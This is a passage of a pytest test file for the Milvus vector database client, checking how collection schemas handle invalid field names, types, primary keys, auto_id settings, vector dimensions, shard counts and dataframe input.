self.collection_wrap.init_collection(c_name, schema=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_invalid_type_schema(self, get_none_removed_invalid_strings):
"""
target: test collection with invalid schema
method: create collection with non-CollectionSchema type schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
self.collection_wrap.init_collection(c_name, schema=get_none_removed_invalid_strings,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_invalid_type_fields(self, get_invalid_type_fields):
"""
target: test collection with invalid fields type, non-list
method: create collection schema with non-list invalid fields
expected: exception
"""
self._connect()
fields = get_invalid_type_fields
error = {ct.err_code: 0, ct.err_msg: "The fields of schema must be type list"}
self.collection_schema_wrap.init_collection_schema(fields=fields,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_with_unknown_type(self):
"""
target: test collection with unknown type
method: create with DataType.UNKNOWN
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="unknown", dtype=DataType.UNKNOWN,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
@pytest.mark.parametrize("name", [[], 1, (1,), {1: 1}, "12-s"])
def test_collection_invalid_type_field(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=5, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_field_name(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_none_field_name(self):
"""
target: test field schema with None name
method: None field name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=None, dtype=DataType.INT64, is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "You should specify the name of field"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [6, [[]], {}, (), "", "a"])
def test_collection_invalid_field_type(self, dtype):
"""
target: test collection with invalid field type
method: invalid DataType
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="test", dtype=dtype, is_primary=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_field_dtype_float_value(self):
"""
target: test collection with float type
method: create field with float type
        expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=5.0,
is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 0, ct.err_msg: "Field type must be of DataType!"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_empty_fields(self):
"""
target: test collection with empty fields
method: create collection with fields = []
expected: exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=[], primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_field(self):
"""
target: test collection with dup field name
method: Two FieldSchema have same name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
schema = cf.gen_collection_schema(fields=[field_one, field_two, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "duplicated field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("field", [cf.gen_float_vec_field(), cf.gen_binary_vec_field()])
def test_collection_only_vector_field(self, field):
"""
target: test collection just with vec field
method: create with float-vec fields
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe"}
self.collection_schema_wrap.init_collection_schema([field], check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_float_vectors(self):
"""
target: test collection with multi float vectors
method: create collection with two float-vec fields
        expected: collection created successfully
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_float_vec_field(name="tmp")]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_mix_vectors(self):
"""
target: test collection with mix vectors
method: create with float and binary vec
        expected: collection created successfully
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_binary_vec_field()]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_without_vectors(self):
"""
target: test collection without vectors
method: create collection only with int field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "No vector field is found."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_primary_field(self):
"""
target: test collection without primary field
method: no primary field specified in collection schema and fields
expected: raise exception
"""
self._connect()
int_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64)
vec_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_float_vec_field_name,
dtype=DataType.FLOAT_VECTOR, dim=ct.default_dim)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema([int_fields, vec_fields],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_is_primary_false(self):
"""
target: test collection with all is_primary false
        method: set is_primary=False on all fields
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=False), cf.gen_float_field(is_primary=False),
cf.gen_float_vec_field(is_primary=False)]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("is_primary", ct.get_invalid_strs)
def test_collection_invalid_is_primary(self, is_primary):
"""
target: test collection with invalid primary
method: define field with is_primary=non-bool
expected: raise exception
"""
self._connect()
name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Param is_primary must be bool type"}
self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=is_primary,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_primary_field(self, primary_field):
"""
target: test collection with invalid primary_field
method: specify invalid string primary_field in collection schema
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_non_string_primary_field(self, primary_field):
"""
target: test collection with non-string primary_field
method: primary_field type is not string
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_not_existed_primary_field(self):
"""
target: test collection with not exist primary field
method: specify not existed field as primary_field
expected: raise exception
"""
self._connect()
fake_field = cf.gen_unique_str()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=fake_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_schema(self):
"""
target: test collection with primary field
method: specify primary field in CollectionSchema
expected: collection.primary_field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_field(self):
"""
target: test collection with primary field
method: specify primary field in FieldSchema
expected: verify collection.primary_field is the specified field
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(), cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
self.collection_wrap.init_collection(cf.gen_unique_str(prefix), schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_unsupported_primary_field(self, get_unsupported_primary_field):
"""
target: test collection with unsupported primary field type
method: specify non-int64 as primary field
expected: raise exception
"""
self._connect()
field = get_unsupported_primary_field
vec_field = cf.gen_float_vec_field(name="vec")
error = {ct.err_code: 1, ct.err_msg: "Primary key type must be DataType.INT64."}
self.collection_schema_wrap.init_collection_schema(fields=[field, vec_field], primary_field=field.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_primary_fields(self):
"""
target: test collection with multi primary
method: collection with two primary fields
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2", is_primary=True)
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one."}
self.collection_schema_wrap.init_collection_schema(
fields=[int_field_one, int_field_two, cf.gen_float_vec_field()],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_inconsistent(self):
"""
target: test collection with different primary field setting
method: 1. set A field is_primary 2. set primary_field is B
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=int_field_two.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_consistent(self):
"""
target: test collection with both collection schema and field schema
method: 1. set A field is_primary 2. set primary_field is A
expected: verify primary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field(is_primary=True)
schema = cf.gen_collection_schema(fields=[int_field_one, cf.gen_float_vec_field()],
primary_field=int_field_one.name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_field_schema(self, auto_id):
"""
target: test collection with auto_id in field schema
method: specify auto_id True in field schema
expected: verify schema's auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field])
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_collection_schema(self, auto_id):
"""
target: test collection with auto_id in collection schema
method: specify auto_id True in collection schema
expected: verify schema auto_id and collection schema
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_auto_id_non_primary_field(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_false_non_primary(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=False in non-primary field
expected: verify schema auto_id is False
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name='int2', auto_id=False)
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
assert not schema.auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_inconsistent(self):
"""
target: test collection auto_id with both collection schema and field schema
method: 1.set primary field auto_id=True in field schema 2.set auto_id=False in collection schema
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "The auto_id of the collection is inconsistent with "
"the auto_id of the primary key field"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_consistent(self, auto_id):
"""
target: test collection auto_id with both collection schema and field schema
method: set auto_id=True/False both field and schema
expected: verify auto_id
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
@pytest.mark.tags(CaseLabel.L1)
def test_collection_auto_id_none_in_field(self):
"""
target: test collection with auto_id is None
method: set auto_id=None
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
is_primary=True,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("auto_id", ct.get_invalid_strs)
def test_collection_invalid_auto_id(self, auto_id):
"""
target: test collection with invalid auto_id
method: define collection schema with auto_id=non-bool
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_fields_auto_id(self):
"""
target: test collection auto_id with multi fields
method: specify auto_id=True for multi int64 fields
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
cf.gen_int64_field(is_primary=True, auto_id=True)
self.field_schema_wrap.init_field_schema(name="int", dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [DataType.FLOAT_VECTOR, DataType.BINARY_VECTOR])
def test_collection_vector_without_dim(self, dtype):
"""
target: test collection without dimension
method: define vector field without dim
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field, _ = self.field_schema_wrap.init_field_schema(name="vec", dtype=dtype)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "dimension is not defined in field type params"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_vector_invalid_dim(self, get_invalid_dim):
"""
target: test collection with invalid dimension
method: define float-vec field with invalid dimension
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=get_invalid_dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: f'invalid dim: {get_invalid_dim}'}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dim", [-1, 0, 32769])
def test_collection_vector_out_bounds_dim(self, dim):
"""
target: test collection with out of bounds dim
method: invalid dims -1, 0 and 32769
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "invalid dimension: {}. should be in range 1 ~ 32768".format(dim)}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_non_vector_field_dim(self):
"""
target: test collection with dim for non-vector field
method: define int64 field with dim
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
dim=ct.default_dim)
float_vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[int_field, float_vec_field],
primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_desc(self):
"""
target: test collection with description
method: create with description
expected: assert default description
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_none_desc(self):
"""
target: test collection with none description
method: create with none description
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=None)
error = {ct.err_code: 1, ct.err_msg: "None has type NoneType, but expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_long_desc(self):
"""
target: test collection with long desc
method: create with long desc
expected: create collection successfully
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
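# build a 511-character description (256 "a"s joined by "a") to exercise long description values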
desc = "a".join("a" for _ in range(256))
schema = cf.gen_default_collection_schema(description=desc)
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_binary(self):
"""
target: test collection with binary-vec
method: create collection with binary field
expected: assert binary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_binary_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
def test_collection_shards_num_with_default_value(self):
"""
target:test collection with shards_num
method:create collection with shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=default_shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: default_shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("shards_num", [-256, 0, 10, 256])
def test_collection_shards_num_with_not_default_value(self, shards_num):
"""
target:test collection with shards_num
method:create collection with not default shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
def test_collection_shards_num_with_error_type(self):
"""
target:test collection with error type shards_num
method:create collection with error type shards_num
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error_type_shards_num = "2"  # supposed to be int rather than str
error = {ct.err_code: -1, ct.err_msg: "expected one of: int, long"}
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=error_type_shards_num,
check_task=CheckTasks.err_res,
check_items=error)
class TestCollectionOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test collection interface operations
******************************************************************
"""
# def teardown_method(self):
# if self.collection_wrap is not None and self.collection_wrap.collection is not None:
# self.collection_wrap.drop()
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_connection(self):
"""
target: test collection without connection
method: create collection after the connection is removed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.err_res, check_items=error)
assert self.collection_wrap.collection is None
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_create_drop(self):
"""
target: test cycle creation and deletion of multiple collections
method: in a loop, collections are created and deleted sequentially
expected: no exception
"""
self._connect()
c_num = 20
for _ in range(c_num):
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert c_name not in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_drop(self):
"""
target: test collection with dup name, and drop
method: 1. create two collection objects with the same name
        2. drop the collection through one of the objects
expected: collection dropped
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
error = {ct.err_code: 1, ct.err_msg: f'HasPartition failed: can\'t find collection: {c_name}'}
collection_w.has_partition("p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_after_drop(self):
"""
target: test create collection after create and drop
method: 1. create collection a 2. drop collection a 3. re-create collection a
expected: no exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.drop()
assert not self.utility_wrap.has_collection(collection_w.name)[0]
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_all_datatype_fields(self):
"""
target: test create collection with all dataType fields
method: create collection with all dataType schema
expected: create successfully
"""
self._connect()
fields = []
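# build one scalar field for every DataType member, skipping UNKNOWN and the vector types
# (a float vector field is appended separately below)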
for k, v in DataType.__members__.items():
if v and v != DataType.UNKNOWN and v != DataType.FLOAT_VECTOR and v != DataType.BINARY_VECTOR:
field, _ = self.field_schema_wrap.init_field_schema(name=k.lower(), dtype=v)
fields.append(field)
fields.append(cf.gen_float_vec_field())
schema, _ = self.collection_schema_wrap.init_collection_schema(fields,
primary_field=ct.default_int64_field_name)
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
class TestCollectionDataframe(TestcaseBase):
"""
******************************************************************
The following cases are used to test construct_from_dataframe
******************************************************************
"""
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_df(self, request):
if request.param is None:
pytest.skip("skip None")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_dataframe(self):
"""
target: test collection with dataframe data
method: create collection and insert with dataframe
expected: collection num entities equal to nb
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([c_name])
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_binary_dataframe(self):
"""
target: test binary collection with dataframe
method: create binary collection with dataframe
expected: collection num entities equal to nb
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df, _ = cf.gen_default_binary_dataframe_data(nb=ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_none_dataframe(self):
"""
target: test create collection from a None dataframe
method: pass None instead of a dataframe when creating the collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Dataframe can not be None."}
self.collection_wrap.construct_from_dataframe(c_name, None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_only_column(self):
"""
target: test collection with dataframe only columns
method: dataframe only has columns
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame(columns=[ct.default_int64_field_name, ct.default_float_vec_field_name])
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_inconsistent_dataframe(self):
"""
target: test collection with data inconsistent
method: create and insert with inconsistent data
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
# one field different type df
mix_data = [(1, 2., [0.1, 0.2]), (2, 3., 4)]
df = pd.DataFrame(data=mix_data, columns=list("ABC"))
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field='A', check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_non_dataframe(self, get_non_df):
"""
target: test create collection by invalid dataframe
method: create collection from a non-dataframe object
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Data type must be pandas.DataFrame."}
df = get_non_df
self.collection_wrap.construct_from_dataframe(c_name, df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_data_type_dataframe(self):
"""
target: test collection with a dataframe containing an unsupported data type
method: create with a dataframe that has a datetime column
